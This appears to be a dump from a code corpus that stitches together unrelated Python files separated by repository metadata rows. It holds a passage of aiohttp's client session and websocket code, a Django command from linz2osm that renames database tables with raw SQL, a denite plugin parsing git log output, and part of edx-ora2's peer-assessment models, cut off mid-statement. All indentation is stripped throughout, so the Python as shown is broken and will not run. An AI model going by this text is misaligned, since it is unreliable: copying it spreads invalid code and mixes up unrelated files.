# Details: https://github.com/kennethreitz/requests/pull/269
if resp.status != 307:
method = hdrs.METH_GET
data = None
if headers.get(hdrs.CONTENT_LENGTH):
headers.pop(hdrs.CONTENT_LENGTH)
r_url = (resp.headers.get(hdrs.LOCATION) or
resp.headers.get(hdrs.URI))
scheme = urllib.parse.urlsplit(r_url)[0]
if scheme not in ('http', 'https', ''):
resp.close()
raise ValueError('Can redirect only to http or https')
elif not scheme:
r_url = urllib.parse.urljoin(url, r_url)
url = r_url
yield from resp.release()
continue
break
resp._history = tuple(history)
return resp
def ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
"""Initiate websocket connection."""
return _WSRequestContextManager(
self._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
auth=auth,
origin=origin))
@asyncio.coroutine
def _ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
sec_key = base64.b64encode(os.urandom(16))
headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_VERSION: '13',
hdrs.SEC_WEBSOCKET_KEY: sec_key.decode(),
}
if protocols:
headers[hdrs.SEC_WEBSOCKET_PROTOCOL] = ','.join(protocols)
if origin is not None:
headers[hdrs.ORIGIN] = origin
# send request
resp = yield from self.get(url, headers=headers,
read_until_eof=False,
auth=auth)
try:
# check handshake
if resp.status != 101:
raise WSServerHandshakeError(
message='Invalid response status',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.UPGRADE, '').lower() != 'websocket':
raise WSServerHandshakeError(
message='Invalid upgrade header',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.CONNECTION, '').lower() != 'upgrade':
raise WSServerHandshakeError(
message='Invalid connection header',
code=resp.status,
headers=resp.headers)
# key calculation
key = resp.headers.get(hdrs.SEC_WEBSOCKET_ACCEPT, '')
match = base64.b64encode(
hashlib.sha1(sec_key + WS_KEY).digest()).decode()
if key != match:
raise WSServerHandshakeError(
message='Invalid challenge response',
code=resp.status,
headers=resp.headers)
# websocket protocol
protocol = None
if protocols and hdrs.SEC_WEBSOCKET_PROTOCOL in resp.headers:
resp_protocols = [
proto.strip() for proto in
resp.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(',')]
for proto in resp_protocols:
if proto in protocols:
protocol = proto
break
reader = resp.connection.reader.set_parser(WebSocketParser)
resp.connection.writer.set_tcp_nodelay(True)
writer = WebSocketWriter(resp.connection.writer, use_mask=True)
except Exception:
resp.close()
raise
else:
return self._ws_response_class(reader,
writer,
protocol,
resp,
timeout,
autoclose,
autoping,
self._loop)
def _update_cookies(self, cookies):
"""Update shared cookies."""
if isinstance(cookies, dict):
cookies = cookies.items()
for name, value in cookies:
if isinstance(value, http.cookies.Morsel):
# use dict method because SimpleCookie class modifies value
# before Python 3.4
dict.__setitem__(self.cookies, name, value)
else:
self.cookies[name] = value
def _prepare_headers(self, headers):
""" Add default headers and transform it to CIMultiDict
"""
# Convert headers to MultiDict
result = CIMultiDict(self._default_headers)
if headers:
if not isinstance(headers, (MultiDictProxy, MultiDict)):
headers = CIMultiDict(headers)
added_names = set()
for key, value in headers.items():
if key in added_names:
result.add(key, value)
else:
result[key] = value
added_names.add(key)
return result
def get(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP GET request."""
return _RequestContextManager(
self._request(hdrs.METH_GET, url,
allow_redirects=allow_redirects,
**kwargs))
def options(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP OPTIONS request."""
return _RequestContextManager(
self._request(hdrs.METH_OPTIONS, url,
allow_redirects=allow_redirects,
**kwargs))
def head(self, url, *, allow_redirects=False, **kwargs):
"""Perform HTTP HEAD request."""
return _RequestContextManager(
self._request(hdrs.METH_HEAD, url,
allow_redirects=allow_redirects,
**kwargs))
def post(self, url, *, data=None, **kwargs):
"""Perform HTTP POST request."""
return _RequestContextManager(
self._request(hdrs.METH_POST, url,
data=data,
**kwargs))
def put(self, url, *, data=None, **kwargs):
"""Perform HTTP PUT request."""
return _RequestContextManager(
self._request(hdrs.METH_PUT, url,
data=data,
**kwargs))
def patch(self, url, *, data=None, **kwargs):
"""Perform HTTP PATCH request."""
return _RequestContextManager(
self._request(hdrs.METH_PATCH, url,
data=data,
**kwargs))
def delete(self, url, **kwargs):
"""Perform HTTP DELETE request."""
return _RequestContextManager(
self._request(hdrs.METH_DELETE, url,
**kwargs))
def close(self):
"""Close underlying connector.
Release all acquired resources.
"""
if not self.closed:
self._connector.close()
self._connector = None
ret = asyncio.Future(loop=self._loop)
ret.set_result(None)
return ret
@property
def closed(self):
"""Is client session closed.
A readonly property.
"""
return self._connector is None or self._connector.closed
@property
def connector(self):
"""Connector instance used for the session."""
return self._connector
@property
def cookies(self):
"""The session cookies."""
return self._cookies
@property
def version(self):
"""The session HTTP protocol version."""
return self._version
def detach(self):
"""Detach connector from session without closing the former.
Session is switched to closed state anyway.
"""
self._connector = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if PY_35:
@asyncio.coroutine
def __aenter__(self):
return self
@asyncio.coroutine
def __aexit__(self, exc_type, exc_val, exc_tb):
yield from self.close()
if PY_35:
from collections.abc import Coroutine
base = Coroutine
else:
base = object
class _BaseRequestContextManager(base):
__slots__ = ('_coro', '_resp')
def __init__(self, coro):
self._coro = coro
self._resp = None
def send(self, value):
return self._coro.send(value)
def throw(self, typ, val=None, tb=None):
if val is None:
return self._coro.throw(typ)
elif tb is None:
return self._coro.throw(typ, val)
else:
return self._coro.throw(typ, val, tb)
def close(self):
return self._coro.close()
@property
def gi_frame(self):
return self._coro.gi_frame
@property
def gi_running(self):
return self._coro.gi_running
@property
def gi_code(self):
return self._coro.gi_code
def __next__(self):
return self.send(None)
@asyncio.coroutine
def __iter__(self):
resp = yield from self._coro
return resp
if PY_35:
def __await__(self):
resp = yield from self._coro
return resp
@asyncio.coroutine
def __aenter__(self):
self._resp = yield from self._coro
return self._resp
if not PY_35:
try:
from asyncio import coroutines
coroutines._COROUTINE_TYPES += (_BaseRequestContextManager,)
except:
pass
class _RequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
if exc_type is not None:
self._resp.close()
else:
yield from self._resp.release()
class _WSRequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
yield from self._resp.close()
class _DetachedRequestContextManager(_RequestContextManager):
__slots__ = _RequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
@asyncio.coroutine
def __iter__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
if PY_35:
def __await__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
def __del__(self):
self._session.detach()
class _DetachedWSRequestContextManager(_WSRequestContextManager):
__slots__ = _WSRequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
def __del__(self):
self._session.detach()
def request(method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
cookies=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
connector=None,
loop=None,
read_until_eof=True,
request_class=None,
response_class=None):
"""Constructs and sends a request. Returns response object.
:param str method: HTTP method
:param str url: request url
:param params: (optional) Dictionary or bytes to be sent in the query
string of the new request
:param data: (optional) Dictionary, bytes, or file-like object to
send in the body of the request
:param dict headers: (optional) Dictionary of HTTP Headers to send with
the request
:param dict cookies: (optional) Dict object to send with the request
:param auth: (optional) BasicAuth named tuple represent HTTP Basic Auth
:type auth: aiohttp.helpers.BasicAuth
:param bool allow_redirects: (optional) If set to False, do not follow
redirects
:param version: Request HTTP version.
:type version: aiohttp.protocol.HttpVersion
:param bool compress: Set to True if request has to be compressed
with deflate encoding.
:param chunked: Set to chunk size for chunked transfer encoding.
:type chunked: bool or int
:param bool expect100: Expect 100-continue response from server.
:param connector: BaseConnector sub-class instance to support
connection pooling.
:type connector: aiohttp.connector.BaseConnector
:param bool read_until_eof: Read response until eof if response
does not have Content-Length header.
:param request_class: (optional) Custom Request class implementation.
:param response_class: (optional) Custom Response class implementation.
:param loop: Optional event loop.
Usage::
>>> import aiohttp
>>> resp = yield from aiohttp.request('GET', 'http://python.org/')
>>> resp
<ClientResponse(python.org/) [200]>
>>> data = yield from resp.read()
"""
warnings.warn("Use ClientSession().request() instead", DeprecationWarning)
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
kwargs = {}
if request_class is not None:
kwargs['request_class'] = request_class
if response_class is not None:
kwargs['response_class'] = response_class
session = ClientSession(loop=loop,
cookies=cookies,
connector=connector,
**kwargs)
return _DetachedRequestContextManager(
session._request(method, url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof),
session=session)
def get(url, **kwargs):
warnings.warn("Use ClientSession().get() instead", DeprecationWarning)
return request(hdrs.METH_GET, url, **kwargs)
def options(url, **kwargs):
warnings.warn("Use ClientSession().options() instead", DeprecationWarning)
return request(hdrs.METH_OPTIONS, url, **kwargs)
def head(url, **kwargs):
warnings.warn("Use ClientSession().head() instead", DeprecationWarning)
return request(hdrs.METH_HEAD, url, **kwargs)
def post(url, **kwargs):
warnings.warn("Use ClientSession().post() instead", DeprecationWarning)
return request(hdrs.METH_POST, url, **kwargs)
def put(url, **kwargs):
warnings.warn("Use ClientSession().put() instead", DeprecationWarning)
return request(hdrs.METH_PUT, url, **kwargs)
def patch(url, **kwargs):
warnings.warn("Use ClientSession().patch() instead", DeprecationWarning)
return request(hdrs.METH_PATCH, url, **kwargs)
def delete(url, **kwargs):
warnings.warn("Use ClientSession().delete() instead", DeprecationWarning)
return request(hdrs.METH_DELETE, url, **kwargs)
def ws_connect(url, *, protocols=(), timeout=10.0, connector=None, auth=None,
ws_response_class=ClientWebSocketResponse, autoclose=True,
autoping=True, loop=None, origin=None, headers=None):
warnings.warn("Use ClientSession().ws_connect() instead",
DeprecationWarning)
if loop is None:
loop = asyncio.get_event_loop()
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
session = aiohttp.ClientSession(loop=loop, connector=connector, auth=auth,
ws_response_class=ws_response_class,
headers=headers)
return _DetachedWSRequestContextManager(
session._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
origin=origin),
session=session)
| apache-2.0 | -5,988,827,585,146,491,000 | 32.456464 | 79 | 0.536199 | false |
opennewzealand/linz2osm | linz2osm/data_dict/management/commands/update_layer_names.py | 1 | 4626 | # LINZ-2-OSM
# Copyright (C) Koordinates Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db import transaction, connection, connections
from linz2osm.data_dict.models import Layer, LayerInDataset, Dataset, Tag
RENAMES = {
'breakwtr_cl': 'breakwater_cl',
'cattlstp_pnt': 'cattlestop_pnt',
'cblwy_ind_cl': 'cableway_industrial_cl',
'cblwy_peo_cl': 'cableway_people_cl',
'descrip_text': 'descriptive_text',
'dredg_tl_cl': 'dredge_tailing_cl',
'embankmnt_cl': 'embankment_cl',
'ferry_cr_cl': 'ferry_crossing_cl',
'fish_fm_poly': 'fish_farm_poly',
'floodgte_pnt': 'floodgate_pnt',
'gas_val_pnt': 'gas_valve_pnt',
'geo_name': 'geographic_name',
'gl_lake_poly': 'glacial_lake_poly',
'golf_crs_pnt': 'golf_course_pnt',
'golf_crs_poly': 'golf_course_poly',
'grav_pit_poly': 'gravel_pit_poly',
'hist_ste_pnt': 'historic_site_pnt',
'ice_clf_edge': 'ice_cliff_edge',
'ice_strm_cl': 'ice_stream_pnt',
'marne_fm_cl': 'marine_farm_cl',
'marne_fm_poly': 'marine_farm_poly',
'melt_strm_cl': 'melt_stream_cl',
'moran_wl_poly': 'moraine_wall_poly',
'pumce_pt_poly': 'pumice_pit_poly',
'racetrk_cl': 'racetrack_cl',
'racetrk_pnt': 'racetrack_pnt',
'racetrk_poly': 'racetrack_poly',
'radar_dm_pnt': 'radar_dome_pnt',
'rail_stn_pnt': 'rail_station_pnt',
'reservr_poly': 'reservoir_poly',
'res_area_poly': 'residential_area_poly',
'rifle_rg_poly': 'rifle_range_poly',
'rock_out_pnt': 'rock_outcrop_pnt',
'sat_stn_pnt': 'satellite_station_pnt',
'scatscrb_poly': 'scattered_scrub_poly',
'shelt_blt_cl': 'shelter_belt_cl',
'showgrd_poly': 'showground_poly',
'spillwy_edge': 'spillway_edge',
'sprtfld_poly': 'sportsfield_poly',
'telephn_cl': 'telephone_cl',
'waterfal_edg': 'waterfall_edge',
'waterfal_cl': 'waterfall_cl',
'waterfal_pnt': 'waterfall_pnt',
'waterfal_poly': 'waterfall_poly',
'water_r_cl': 'water_race_cl',
}
class Command(BaseCommand):
help = "Rename layers with old abbreviated names"
def handle(self, **options):
# drop existing layers with new names: only needed if you've run dd_load
# before update_layer_names
# for new_name in RENAMES.values():
# for l in Layer.objects.filter(name=new_name):
# l.delete()
with transaction.commit_on_success():
cursor = connection.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE data_dict_layer SET name = %s WHERE name = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_tag SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_layerindataset SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
print 'CONNECTION: default'
for q in connection.queries:
print q['sql']
# the actual layers
for conn_name in connections:
if conn_name != 'default':
conn = connections[conn_name]
with transaction.commit_on_success():
cursor = conn.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s;", [new_name, old_name])
cursor.execute("SELECT 1 FROM pg_tables WHERE schemaname='public' AND tablename=%s;", [old_name])
old_table_exists = cursor.fetchall()
if old_table_exists:
print "In %s renaming %s to %s" % (conn_name, old_name, new_name)
cursor.execute("ALTER TABLE %s RENAME TO %s;" % (old_name, new_name))
print 'CONNECTION: %s' % (conn_name,)
for q in conn.queries:
print q['sql']
| gpl-3.0 | 9,209,304,426,773,775,000 | 42.641509 | 134 | 0.610463 | false |
kmnk/gitn | rplugin/python3/denite/source/gitn_log.py | 1 | 5421 | # File: gitn_log.py
# Author: kmnk <kmnknmk at gmail.com>
# License: MIT license
from gitn.enum import Window
from gitn.util.gitn import Gitn
from denite.process import Process
import os
import re
import time
from .gitn import Source as Base
DATE_GRAPH_HIGHLIGHT = {
'container': {
'name': 'gitnLog_dateGraphHeader',
'pattern': '\\v((\d{4}\/\d{2}\/\d{2} \d{2}:\d{2} )| {16} )[*|\/\-\ ]+',
},
'containees': [
{
'name': 'gitnLog_date',
'pattern': '\\v\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}',
'color': 'Comment',
'next': 'gitnLog_graph',
},
{
'name': 'gitnLog_graph',
'pattern': '\\v[*|\/\-\\ ]+',
'color': 'Statement',
},
],
}
AUTHOR_NAME_HIGHLIGHT = {
'container': {
'name': 'gitnLog_authorNameHeader',
'pattern': '\\v:[^:]+: ',
},
'containees': [
{
'name': 'gitnLog_separator',
'pattern': '\\v:',
'color': 'Comment',
},
{
'name': 'gitnLog_authorName',
'pattern': '\\v[^:]+',
'color': 'Type',
},
],
}
class Source(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'gitn_log'
self.kind = 'gitn_log'
self.vars = {
'command': ['git'],
'action': ['log'],
'default_opts': [
'--date=default',
'--graph',
'--pretty=format:":::%H:::%P:::%an:::%ae:::%ad:::%at:::%cn:::%ce:::%cd:::%ct:::%s:::"',
],
'separator': ['--'],
'file': [],
'window': 'tab',
}
def on_init(self, context):
self.__proc = None
if len(context['args']) >= 1:
self.vars['file'] = [context['args'][0]]
else:
self.vars['file'] = []
if len(context['args']) >= 2:
if Window.has(context['args'][1]):
self.vars['window'] = context['args'][1]
else:
self.vars['window'] = 'tab'
def on_close(self, context):
if self.__proc:
self.__proc.kill()
self.__proc = None
def highlight(self):
Gitn.highlight(self.vim, DATE_GRAPH_HIGHLIGHT)
Gitn.highlight(self.vim, AUTHOR_NAME_HIGHLIGHT)
def define_syntax(self):
self.vim.command(
'syntax region ' + self.syntax_name + ' start=// end=/$/ '
'contains=gitnLog_dateGraphHeader,gitnLog_authorNameHeader,deniteMathced contained')
def gather_candidates(self, context):
if self.__proc:
return self.__async_gather_candidates(context, 0.5)
commands = []
commands += self.vars['command']
commands += self.vars['action']
commands += self.vars['default_opts']
commands += self.vars['separator']
commands += self.vars['file']
self.__proc = Process(commands, context, self.vim.call('expand', context['path']))
return self.__async_gather_candidates(context, 2.0)
def __async_gather_candidates(self, context, timeout):
outs, errs = self.__proc.communicate(timeout=timeout)
context['is_async'] = not self.__proc.eof()
if self.__proc.eof():
self.__proc = None
candidates = []
for line in outs:
result = self.__parse(line)
if result:
if 'subject' in result and result['subject'] != '':
candidates.append({
'word': '{0} {1}: {2} : {3}'.format(
time.strftime('%Y/%m/%d %H:%M', time.gmtime(result['author']['time'])),
result['graph'],
result['author']['name'],
result['subject'],
),
'action__log': result,
'action__path': context['args'][0] if len(context['args']) >= 1 else '',
'action__window': self.vars['window'],
})
elif 'graph' in result:
candidates.append({
'word': ' {0}'.format(result['graph'].strip()),
})
return candidates
def __parse(self, line):
m = re.search(r'^([*|/\\ ]+)\s?(.+)?$', line)
[graph, value] = m.groups()
if not m or not m.group(2): return { 'graph': graph }
splited = value.split(':::')
if len(splited) <= 1: return { 'graph': graph }
[own_hash, parent_hash, author_name, author_email, author_date, author_time, committer_name, committer_email, committer_date, committer_time, subject] = splited[1:-1]
return {
'graph': graph,
'subject': subject,
'hash': {
'own': own_hash,
'parent': parent_hash,
},
'author': {
'name': author_name,
'email': author_email,
'date': author_date,
'time': int(author_time, 10),
},
'committer': {
'name': committer_name,
'email': committer_email,
'date': committer_date,
'time': int(committer_time, 10),
},
}
| mit | 632,974,363,430,759,600 | 29.455056 | 174 | 0.448072 | false |
Lektorium-LLC/edx-ora2 | openassessment/assessment/models/peer.py | 1 | 18730 | """
Django models specific to peer assessment.
NOTE: We've switched to migrations, so if you make any edits to this file, you
need to then generate a matching migration for it using:
./manage.py schemamigration openassessment.assessment --auto
"""
import random
from datetime import timedelta
from django.db import models, DatabaseError
from django.utils.timezone import now
from openassessment.assessment.models.base import Assessment
from openassessment.assessment.errors import PeerAssessmentWorkflowError, PeerAssessmentInternalError
import logging
logger = logging.getLogger("openassessment.assessment.models")
class AssessmentFeedbackOption(models.Model):
"""
Option a student can select to provide feedback on the feedback they received.
`AssessmentFeedback` stands in a one-to-many relationship with `AssessmentFeedbackOption`s:
a student can select zero or more `AssessmentFeedbackOption`s when providing feedback.
Over time, we may decide to add, delete, or reword assessment feedback options.
To preserve data integrity, we will always get-or-create `AssessmentFeedbackOption`s
based on the option text.
"""
text = models.CharField(max_length=255, unique=True)
class Meta:
app_label = "assessment"
def __unicode__(self):
return u'"{}"'.format(self.text)
class AssessmentFeedback(models.Model):
"""
Feedback on feedback. When students receive their grades, they
can provide feedback on how they were assessed, to be reviewed by course staff.
This consists of free-form written feedback
("Please provide any thoughts or comments on the feedback you received from your peers")
as well as zero or more feedback options
("Please select the statements below that reflect what you think of this peer grading experience")
"""
MAXSIZE = 1024 * 100 # 100KB
submission_uuid = models.CharField(max_length=128, unique=True, db_index=True)
assessments = models.ManyToManyField(Assessment, related_name='assessment_feedback', default=None)
feedback_text = models.TextField(max_length=10000, default="")
options = models.ManyToManyField(AssessmentFeedbackOption, related_name='assessment_feedback', default=None)
class Meta:
app_label = "assessment"
def add_options(self, selected_options):
"""
Select feedback options for this assessment.
Students can select zero or more options.
Note: you *must* save the model before calling this method.
Args:
option_text_list (list of unicode): List of options that the user selected.
Raises:
DatabaseError
"""
# First, retrieve options that already exist
options = list(AssessmentFeedbackOption.objects.filter(text__in=selected_options))
# If there are additional options that do not yet exist, create them
new_options = [text for text in selected_options if text not in [opt.text for opt in options]]
for new_option_text in new_options:
options.append(AssessmentFeedbackOption.objects.create(text=new_option_text))
# Add all options to the feedback model
# Note that we've already saved each of the AssessmentFeedbackOption models, so they have primary keys
# (required for adding to a many-to-many relationship)
self.options.add(*options) # pylint:disable=E1101
class PeerWorkflow(models.Model):
"""Internal Model for tracking Peer Assessment Workflow
This model can be used to determine the following information required
throughout the Peer Assessment Workflow:
1) Get next submission that requires assessment.
2) Does a submission have enough assessments?
3) Has a student completed enough assessments?
4) Does a student already have a submission open for assessment?
5) Close open assessments when completed.
6) Should 'over grading' be allowed for a submission?
The student item is the author of the submission. Peer Workflow Items are
created for each assessment made by this student.
"""
# Amount of time before a lease on a submission expires
TIME_LIMIT = timedelta(hours=8)
student_id = models.CharField(max_length=40, db_index=True)
item_id = models.CharField(max_length=128, db_index=True)
course_id = models.CharField(max_length=255, db_index=True)
submission_uuid = models.CharField(max_length=128, db_index=True, unique=True)
created_at = models.DateTimeField(default=now, db_index=True)
completed_at = models.DateTimeField(null=True, db_index=True)
grading_completed_at = models.DateTimeField(null=True, db_index=True)
cancelled_at = models.DateTimeField(null=True, db_index=True)
class Meta:
ordering = ["created_at", "id"]
app_label = "assessment"
@property
def is_cancelled(self):
"""
Check if workflow is cancelled.
Returns:
True/False
"""
return bool(self.cancelled_at)
@classmethod
def get_by_submission_uuid(cls, submission_uuid):
"""
Retrieve the Peer Workflow associated with the given submission UUID.
Args:
submission_uuid (str): The string representation of the UUID belonging
to the associated Peer Workflow.
Returns:
workflow (PeerWorkflow): The most recent peer workflow associated with
this submission UUID.
Raises:
PeerAssessmentWorkflowError: Thrown when no workflow can be found for
the associated submission UUID. This should always exist before a
student is allow to request submissions for peer assessment.
Examples:
>>> PeerWorkflow.get_workflow_by_submission_uuid("abc123")
{
'student_id': u'Bob',
'item_id': u'type_one',
'course_id': u'course_1',
'submission_uuid': u'1',
'created_at': datetime.datetime(2014, 1, 29, 17, 14, 52, 668850, tzinfo=<UTC>)
}
"""
try:
return cls.objects.get(submission_uuid=submission_uuid)
except cls.DoesNotExist:
return None
except DatabaseError:
error_message = (
u"Error finding workflow for submission UUID {}. Workflow must be "
u"created for submission before beginning peer assessment."
).format(submission_uuid)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
@classmethod
def create_item(cls, scorer_workflow, submission_uuid):
"""
Create a new peer workflow for a student item and submission.
Args:
scorer_workflow (PeerWorkflow): The peer workflow associated with the scorer.
submission_uuid (str): The submission associated with this workflow.
Raises:
PeerAssessmentInternalError: Raised when there is an internal error
creating the Workflow.
"""
peer_workflow = cls.get_by_submission_uuid(submission_uuid)
try:
workflow_items = PeerWorkflowItem.objects.filter(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
if len(workflow_items) > 0:
item = workflow_items[0]
else:
item = PeerWorkflowItem.objects.create(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
item.started_at = now()
item.save()
return item
except DatabaseError:
error_message = (
u"An internal error occurred while creating a new peer workflow "
u"item for workflow {}"
).format(scorer_workflow)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def find_active_assessments(self):
"""Given a student item, return an active assessment if one is found.
Before retrieving a new submission for a peer assessor, check to see if that
assessor already has a submission out for assessment. If an unfinished
assessment is found that has not expired or has not been cancelled,
return the associated submission.
TODO: If a user begins an assessment, then resubmits, this will never find
the unfinished assessment. Is this OK?
Args:
workflow (PeerWorkflow): See if there is an associated active assessment
for this PeerWorkflow.
Returns:
(PeerWorkflowItem) The PeerWorkflowItem for the submission that the
student has open for active assessment.
"""
oldest_acceptable = now() - self.TIME_LIMIT
items = list(self.graded.all().select_related('author').order_by("-started_at", "-id"))
valid_open_items = []
completed_sub_uuids = []
# First, remove all completed items.
for item in items:
if item.assessment is not None or item.author.is_cancelled:
completed_sub_uuids.append(item.submission_uuid)
else:
valid_open_items.append(item)
# Remove any open items which have a submission which has been completed.
for item in valid_open_items:
if (item.started_at < oldest_acceptable or
item.submission_uuid in completed_sub_uuids):
valid_open_items.remove(item)
return valid_open_items[0] if valid_open_items else None
def get_submission_for_review(self, graded_by):
"""
Find a submission for peer assessment. This function will find the next
submission that requires assessment, excluding any submission that has been
completely graded, or is actively being reviewed by other students.
Args:
graded_by (unicode): Student ID of the scorer.
Returns:
submission_uuid (str): The submission_uuid for the submission to review.
Raises:
PeerAssessmentInternalError: Raised when there is an error retrieving
the workflows or workflow items for this request.
"""
timeout = (now() - self.TIME_LIMIT).strftime("%Y-%m-%d %H:%M:%S")
# The follow query behaves as the Peer Assessment Queue. This will
# find the next submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Does not have enough completed assessments
# 3) Is not something you have already scored.
# 4) Does not have a combination of completed assessments or open
# assessments equal to or more than the requirement.
# 5) Has not been cancelled.
try:
peer_workflows = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where pw.item_id=%s "
"and pw.course_id=%s "
"and pw.student_id<>%s "
"and pw.grading_completed_at is NULL "
"and pw.cancelled_at is NULL "
"and pw.id not in ("
" select pwi.author_id "
" from assessment_peerworkflowitem pwi "
" where pwi.scorer_id=%s "
" and pwi.assessment_id is not NULL "
") "
"and ("
" select count(pwi.id) as c "
" from assessment_peerworkflowitem pwi "
" where pwi.author_id=pw.id "
" and (pwi.assessment_id is not NULL or pwi.started_at > %s) "
") < %s "
"order by pw.created_at, pw.id "
"limit 1; ",
[
self.item_id,
self.course_id,
self.student_id,
self.id,
timeout,
graded_by
]
))
if not peer_workflows:
return None
return peer_workflows[0].submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def get_submission_for_over_grading(self):
"""
Retrieve the next submission uuid for over grading in peer assessment.
"""
# The follow query behaves as the Peer Assessment Over Grading Queue. This
# will find a random submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Is not something you have already scored
# 3) Has not been cancelled.
try:
query = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where course_id=%s "
"and item_id=%s "
"and student_id<>%s "
"and pw.cancelled_at is NULL "
"and pw.id not in ( "
"select pwi.author_id "
"from assessment_peerworkflowitem pwi "
"where pwi.scorer_id=%s"
"); ",
[self.course_id, self.item_id, self.student_id, self.id]
))
workflow_count = len(query)
if workflow_count < 1:
return None
random_int = random.randint(0, workflow_count - 1)
random_workflow = query[random_int]
return random_workflow.submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def close_active_assessment(self, submission_uuid, assessment, num_required_grades):
"""
Updates a workflow item on the student's workflow with the associated
assessment. When a workflow item has an assessment, it is considered
finished.
Args:
submission_uuid (str): The submission the scorer is grading.
assessment (PeerAssessment): The associate assessment for this action.
graded_by (int): The required number of grades the peer workflow
requires to be considered complete.
Returns:
None
"""
try:
item_query = self.graded.filter(
submission_uuid=submission_uuid
).order_by("-started_at", "-id") # pylint:disable=E1101
items = list(item_query[:1])
if not items:
msg = (
u"No open assessment was found for learner {} while assessing "
u"submission UUID {}."
).format(self.student_id, submission_uuid)
raise PeerAssessmentWorkflowError(msg)
item = items[0]
item.assessment = assessment
item.save()
if (
not item.author.grading_completed_at and
item.author.graded_by.filter(assessment__isnull=False).count() >= num_required_grades
):
item.author.grading_completed_at = now()
item.author.save()
except (DatabaseError, PeerWorkflowItem.DoesNotExist):
error_message = (
u"An internal error occurred while retrieving a workflow item for "
u"learner {}. Workflow Items are created when submissions are "
u"pulled for assessment."
).format(self.student_id)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
def num_peers_graded(self):
"""
Returns the number of peers the student owning the workflow has graded.
Returns:
integer
"""
return self.graded.filter(assessment__isnull=False).count() # pylint:disable=E1101
def __repr__(self):
return (
"PeerWorkflow(student_id={0.student_id}, item_id={0.item_id}, "
"course_id={0.course_id}, submission_uuid={0.submission_uuid}"
"created_at={0.created_at}, completed_at={0.completed_at})"
).format(self)
def __unicode__(self):
return repr(self)
class PeerWorkflowItem(models.Model):
"""Represents an assessment associated with a particular workflow
Created every time a submission is requested for peer assessment. The
associated workflow represents the scorer of the given submission, and the
assessment represents the completed assessment for this work item.
"""
scorer = models.ForeignKey(PeerWorkflow, related_name='graded')
author = models.ForeignKey(PeerWorkflow, related_name='graded_by')
submission_uuid = models.CharField(max_length=128, db_index=True)
started_at = models.DateTimeField(default=now, db_index=True)
assessment = models.ForeignKey(Assessment, null=True)
# This WorkflowItem was used to determine the final score for the Workflow.
scored = models.BooleanField(default=False)
@classmethod
def get_scored_assessments(cls, submission_uuid):
"""
Return all scored assessments for a given submission.
Args:
submission_uuid (str): The UUID of the submission.
Returns:
QuerySet of Assessment objects.
"""
return Assessment.objects.filter(
pk__in=[
